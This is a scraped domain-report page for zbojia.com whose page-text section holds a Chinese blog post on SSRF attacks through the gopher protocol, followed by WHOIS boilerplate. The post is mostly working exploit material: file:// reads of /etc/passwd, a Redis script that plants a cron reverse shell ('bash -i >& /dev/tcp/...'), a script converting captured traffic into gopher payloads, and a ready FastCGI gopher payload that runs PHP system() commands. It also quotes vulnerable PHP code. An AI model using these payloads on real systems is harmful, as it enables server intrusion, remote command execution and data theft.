zbojia.com Report : Visit Site

Technical data of the zbojia.com

Geo IP provides you such as latitude, longitude and ISP (Internet Service Provider) etc. informations. Our GeoIP service found where is host zbojia.com. Currently, hosted in China and its service provider is Aliyun Computing Co. Ltd .

HTTP Header Analysis

HTTP Header information is a part of HTTP protocol that a user's browser sends to called Apache/2.4.18 (Ubuntu) containing the details of what the browser wants and will accept back from the web server.

DNS

HtmlToText

当前网页 不支持 你正在使用的浏览器. 为了正常的访问, 请 升级你的浏览器 . 剑未配妥，出门已是江湖 酒尚余温，入口不识乾坤 搜索关键字 搜索 首页 link speak ssrf原理和利用gopher攻击内网应用 作者: 时间: 2018-05-25 分类: 渗透测试 评论 1.ssrf 简介 ssrf(server-side request forge, 服务端请求伪造)。 由攻击者构造的攻击链接传给服务端执行造成的漏洞，一般用来在外网探测或攻击内网服务。 2.利用 file协议读取文件 root@happy-pc:~# curl 127.0.0.1/ssrf.php?url=file:///etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin ...... dict协议探测端口 root@happy-pc:~# curl 127.0.0.1/ssrf.php?url=dict://127.0.0.1:6379/info -err syntax error, try client (list | kill | getname | setname | pause | reply) $2664 # server redis_version:4.0.1 redis_git_sha1:00000000 ...... gopher协议构造post请求内网 root@happy-pc:~# curl 127.0.0.1/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%2f_post%20%2fpost.php%20http%2f1.1%250d%250ahost%3a%20127.0.0.1%250d%250auser-agent%3a%20curl%2f7.43.0%250d%250aaccept%3a%20*%2f*%250d%250acontent-length%3a%2029%250d%250acontent-type%3a%20application%2fx-www-form-urlencoded%250d%250a%250d%250apost=1 root@happy-pc:~# curl 127.0.0.1/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a80%2f_post%2520%252fpost.php%2520http%252f1.1%250d%250ahost%3a127.0.0.1%250d%250auser-agent%3a%2520curl%2f7.43.0%250d%250aaccept%3a*%2f*%250d%250acontent-length%3a49%250d%250acontent-type%3a%2520application%2fx-www-form-urlencoded%250d%250a%250d%250apost%3d1 http/1.1 200 ok date: fri, 25 may 2018 11:49:09 gmt server: apache/2.4.27 (debian) content-length: 6 connection: close content-type: text/html; charset=utf-8 ok!1 3.利用gopher攻击内网应用 以下转自 大佬写的已经很好了： ssrf for php 3.1 redis反弹shell 利用脚本 echo -e "\n\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1\n\n\n"|redis-cli -h $1 -p $2 -x set 1 redis-cli -h $1 -p $2 config set dir /var/spool/cron/ redis-cli -h $1 -p $2 config set dbfilename root redis-cli -h $1 -p $2 save redis-cli -h $1 -p $2 quit 本地执行脚本命令 bash shell.sh 127.0.0.1 6379 想获取redis攻击的tcp数据包，可以使用socat进行端口转发。转发命令如下： socat -v tcp-listen:4444,fork tcp-connect:localhost:6379 意思是将本地的4444端口转发到本地的6379端口。访问该服务器的4444端口，访问的其实是该服务器的6379端口。 执行脚本 bash shell.sh 127.0.0.1 4444 捕获到数据如下： > 2017/10/11 01:24:52.432446 length=85 from=0 to=84 *3\r $3\r set\r $1\r 1\r $58\r */1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1 \r < 2017/10/11 01:24:52.432685 length=5 from=0 to=4 +ok\r > 2017/10/11 01:24:52.435153 length=57 from=0 to=56 *4\r $6\r config\r $3\r set\r $3\r dir\r $16\r /var/spool/cron/\r < 2017/10/11 01:24:52.435332 length=5 from=0 to=4 +ok\r > 2017/10/11 01:24:52.437594 length=52 from=0 to=51 *4\r $6\r config\r $3\r set\r $10\r dbfilename\r $4\r root\r < 2017/10/11 01:24:52.437760 length=5 from=0 to=4 +ok\r > 2017/10/11 01:24:52.439943 length=14 from=0 to=13 *1\r $4\r save\r < 2017/10/11 01:24:52.443318 length=5 from=0 to=4 +ok\r > 2017/10/11 01:24:52.446034 length=14 from=0 to=13 *1\r $4\r quit\r < 2017/10/11 01:24:52.446148 length=5 from=0 to=4 +ok\r 转换规则如下： 如果第一个字符是 > 或者 < 那么丢弃该行字符串，表示请求和返回的时间。 如果前3个字符是 +ok 那么丢弃该行字符串，表示返回的字符串。 将 \r 字符串替换成 %0d%0a 空白行替换为 %0a 写了个脚本进行转换： tran2gopher.py python tran2gopher.py socat.log #coding: utf-8 #author: joychou import sys exp = '' with open(sys.argv[1]) as f: for line in f.readlines(): if line[0] in '><+': continue # 判断倒数第2、3字符串是否为\r elif line[-3:-1] == r'\r': # 如果该行只有\r，将\r替换成%0a%0d%0a if len(line) == 3: exp = exp + '%0a%0d%0a' else: line = line.replace(r'\r', '%0d%0a') # 去掉最后的换行符 line = line.replace('\n', '') exp = exp + line # 判断是否是空行，空行替换为%0a elif line == '\x0a': exp = exp + '%0a' else: line = line.replace('\n', '') exp = exp + line print exp 结果为： *3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$58%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a 需要注意的是，如果要换ip和端口，前面的 $58 也需要更改， $58 表示字符串长度为58个字节，上面的exp即是 %0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0a ，3+51+4=58。如果想换成42.256.24.73，那么$58需要改成$61，以此类推就行,'$'字符需要url编码。 本地curl测试是否成功写入： curl -v 'gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$58%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a' 返回5个ok +ok +ok +ok +ok +ok 证明应该没有问题。那再检测以下redis写入的字段和crontab的内容。 检测redis数据库的字段为 "\n\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1\n\n\n\n" 检测crontab的内容也没有问题 3.2 攻击fastcgi libcurl版本>=7.45.0 php-fpm监听端口 php-fpm版本 >= 5.3.3 知道服务器上任意一个php文件的绝对路径 由于exp里有%00，curl版本小于7.45.0的版本，gopher的%00会被截断。 https://curl.haxx.se/changes.html#7_45_0 fixed in 7.45.0 - october 7 2015 gopher: don't send nul byte 监听一个端口的流量 nc -lvv 2333 > 1.txt ，执行exp，流量打到2333端口 python fpm.py -c "<?php system('echo sectest > /tmp/1.php'); exit;?>" -p 2333 127.0.0.1 /usr/local/nginx/html/p.php urlencode f = open('1.txt') ff = f.read() from urllib import quote print quote(ff) 得到gopher的exp %01%01%16%21%00%08%00%00%00%01%00%00%00%00%00%00%01%04%16%21%01%e7%00%00%0e%02content_length50%0c%10content_typeapplication/text%0b%04remote_port9985%0b%09server_namelocalhost%11%0bgateway_interfacefastcgi/1.0%0f%0eserver_softwarephp/fcgiclient%0b%09remote_addr127.0.0.1%0f%1bscript_filename/usr/local/nginx/html/p.php%0b%1bscript_name/usr/local/nginx/html/p.php%09%1fphp_valueauto_prepend_file%20%3d%20php%3a//input%0e%04request_methodpost%0b%02server_port80%0f%08server_protocolhttp/1.1%0c%00query_string%0f%16php_admin_valueallow_url_include%20%3d%20on%0d%01document_root/%0b%09server_addr127.0.0.1%0b%1brequest_uri/usr/local/nginx/html/p.php%01%04%16%21%00%00%00%00%01%05%16%21%002%00%00%3c%3fphp%20system%28%27echo%20sectest%20%3e%20/tmp/1.php%27%29%3b%20exit%3b%3f%3e%01%05%16%21%00%00%00%00 执行exp curl 'gopher://127.0.0.1:9000/_%01%01%16%21%00%08%00%00%00%01%00%00%00%00%00%00%01%04%16%21%01%e7%00%00%0e%02content_length50%0c%10content_typeapplication/text%0b%04remote_port9985%0b%09server_namelocalhost%11%0bgateway_interfacefastcgi/1.0%0f%0eserver_softwarephp/fcgiclient%0b%09remote_addr127.0.0.1%0f%1bscript_filename/usr/local/nginx/html/p.php%0b%1bscript_name/usr/local/nginx/html/p.php%09%1fphp_valueauto_prepend_file%20%3d%20php%3a//input%0e%04request_methodpost%0b%02server_port80%0f%08server_protocolhttp/1.1%0c%00query_string%0f%16php_admin_valueallow_url_include%20%3d%20on%0d%01document_root/%0b%09server_addr127.0.0.1%0b%1brequest_uri/usr/local/nginx/html/p.php%01%04%16%21%00%00%00%00%01%05%16%21%002%00%00%3c%3fphp%20system%28%27echo%20sectest%20%3e%20/tmp/1.php%27%29%3b%20exit%3b%3f%3e%01%05%16%21%00%00%00%00' 4. 漏洞代码 curl造成的ssrf function curl($url){ $ch = curl_init(); curl_setopt($ch, curlopt_url, $url); curl_setopt($ch, curlopt_header, 0); curl_exec($ch); curl_close($ch); } $url = $_get['url']; curl($url); file_get_contents造成的ssrf $url = $_get['url'];; echo file_get_contents($url); fsockopen造成的ssrf function getfile($host,$port,$link) { $fp = fsockopen($host, intval($port), $errno, $errstr, 30); if (!$fp) { echo "$errstr (error number $errno) \n"; } else { $out = "get $link http/1.1\r\n"; $out .= "host: $host\r\n"; $out .= "connection: close\r\n\r\n"; $out .= "\r\n"; fwrite($fp, $out); $contents=''; while (!feof($fp)) { $contents.= fgets($fp, 1024); } fclose($fp); return $contents; } } 5. 漏洞修复 限制协议为http、https 禁止30x跳转 设置url白名单或者限制内网ip 6. reference ssrf to getshell 利用 gopher 协议拓展攻击面 wavr ssrf 0ctf2018 xss bl0g 复现 作者: 时间: 2018-04-15 分类: web 11 条评论 1.csp content-security-policy: script-src 'self' 'unsafe-inline' content-security-policy: default-src 'none'; script-src 'nonce-haovzhmfa+dpxvdtxrzpzq72fjs=' 'strict-dynamic'; style-src 'self'; img-src 'self' data:; media-src 'self'; font-src 'self' data:; connect-src 'self'

URL analysis for zbojia.com

http://www.zbojia.com/index.php/archives/26/#comment-23604
http://www.zbojia.com/index.php/archives/26/#comment-23605
http://www.zbojia.com/index.php/archives/26/#comments
http://www.zbojia.com/index.php/speak.html
http://www.zbojia.com/index.php/archives/26/#comment-23601
http://www.zbojia.com/index.php/archives/26/#comment-23602
http://www.zbojia.com/index.php/archives/26/#comment-23603
http://www.zbojia.com/index.php/archives/40/
http://www.zbojia.com/index.php/page/4/
http://www.zbojia.com/index.php/archives/26/#comment-23606
http://www.zbojia.com/index.php/archives/25/
http://www.zbojia.com/index.php/archives/24/#comments
http://www.zbojia.com/index.php/archives/26/#comment-23600
http://www.zbojia.com/index.php/2017/11/
http://www.zbojia.com/index.php/category/web/

Whois Information

Whois is a protocol that is access to registering information. You can reach when the website was registered, when it will be expire, what is contact details of the site with the following informations. In a nutshell, it includes these informations;

Domain Name: ZBOJIA.COM
Registry Domain ID: 2101424850_DOMAIN_COM-VRSN
Registrar WHOIS Server: grs-whois.hichina.com
Registrar URL: http://www.net.cn
Updated Date: 2017-09-08T16:41:58Z
Creation Date: 2017-03-01T12:44:32Z
Registry Expiry Date: 2022-03-01T12:44:32Z
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar IANA ID: 420
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +86.95187
Domain Status: ok https://icann.org/epp#ok
Name Server: DNS27.HICHINA.COM
Name Server: DNS28.HICHINA.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2019-08-11T16:22:18Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

  REGISTRAR Alibaba Cloud Computing (Beijing) Co., Ltd.

SERVERS

  SERVER com.whois-servers.net

  ARGS domain =zbojia.com

  PORT 43

  TYPE domain

DOMAIN

  NAME zbojia.com

  CHANGED 2017-09-08

  CREATED 2017-03-01

STATUS
ok https://icann.org/epp#ok

NSERVER

  DNS27.HICHINA.COM 106.11.211.69

  DNS28.HICHINA.COM 106.11.211.70

  REGISTERED yes

Mistakes

The following list shows you to spelling mistakes possible of the internet users for the website searched .